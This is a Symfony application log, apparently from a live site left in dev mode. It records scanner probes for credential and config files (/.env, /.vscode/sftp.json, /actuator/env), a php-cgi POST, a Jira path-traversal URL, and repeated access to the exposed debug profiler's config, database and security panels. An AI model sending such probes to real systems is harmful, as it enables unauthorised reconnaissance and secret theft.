  7415. [2025-12-20 16:11:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7416. [2025-12-20 16:11:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7417. [2025-12-20 16:11:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7418. [2025-12-20 16:11:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7419. [2025-12-20 16:11:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7420. [2025-12-20 16:11:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7421. [2025-12-20 16:11:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7422. [2025-12-20 16:11:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7423. [2025-12-20 16:11:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7424. [2025-12-20 16:11:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7425. [2025-12-20 16:11:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7426. [2025-12-20 16:12:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7427. [2025-12-20 16:12:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7428. [2025-12-20 16:12:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7429. [2025-12-20 16:12:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7430. [2025-12-20 16:12:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7431. [2025-12-20 16:12:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7432. [2025-12-20 16:12:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7433. [2025-12-20 16:12:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7434. [2025-12-20 16:12:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7435. [2025-12-20 16:12:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7436. [2025-12-20 16:12:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7437. [2025-12-20 16:12:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7438. [2025-12-20 16:12:17] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  7439. [2025-12-20 16:16:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ba0170","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ba0170?panel=db","method":"GET"} []
  7440. [2025-12-20 16:16:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7441. [2025-12-20 16:18:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=config","method":"GET"} []
  7442. [2025-12-20 16:18:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7443. [2025-12-20 16:19:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d0b749","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d0b749?panel=db","method":"GET"} []
  7444. [2025-12-20 16:19:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7445. [2025-12-20 16:21:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=security","method":"GET"} []
  7446. [2025-12-20 16:21:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7447. [2025-12-20 16:29:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=form","method":"GET"} []
  7448. [2025-12-20 16:29:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  7449. [2025-12-20 16:30:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7450. [2025-12-20 16:33:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=time","method":"GET"} []
  7451. [2025-12-20 16:33:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7452. [2025-12-20 16:33:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23f7f1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/23f7f1?panel=request","method":"GET"} []
  7453. [2025-12-20 16:33:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7454. [2025-12-20 16:33:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48ebd7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48ebd7?panel=config","method":"GET"} []
  7455. [2025-12-20 16:33:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7456. [2025-12-20 16:35:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=security","method":"GET"} []
  7457. [2025-12-20 16:35:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7458. [2025-12-20 16:48:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=twig","method":"GET"} []
  7459. [2025-12-20 16:48:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  7460. [2025-12-20 16:48:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"785c3e","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/785c3e?panel=request","method":"GET"} []
  7461. [2025-12-20 16:48:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7462. [2025-12-20 16:49:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=router","method":"GET"} []
  7463. [2025-12-20 16:49:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  7464. [2025-12-20 16:56:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=216.106.187.123&limit=10","method":"GET"} []
  7465. [2025-12-20 16:56:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10","method":"GET"} []
  7466. [2025-12-20 17:01:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=config","method":"GET"} []
  7467. [2025-12-20 17:01:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7468. [2025-12-20 17:06:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cdn-cgi/trace"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cdn-cgi/trace\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7469. [2025-12-20 17:08:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32?panel=request","method":"GET"} []
  7470. [2025-12-20 17:08:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7471. [2025-12-20 17:12:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=request","method":"GET"} []
  7472. [2025-12-20 17:12:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7473. [2025-12-20 17:15:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=cache","method":"GET"} []
  7474. [2025-12-20 17:15:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7475. [2025-12-20 17:16:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"559b7d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/559b7d?panel=swiftmailer","method":"GET"} []
  7476. [2025-12-20 17:16:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  7477. [2025-12-20 17:17:03] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7478. [2025-12-20 17:18:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7479. [2025-12-20 17:19:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7480. [2025-12-20 17:20:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=dump","method":"GET"} []
  7481. [2025-12-20 17:20:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
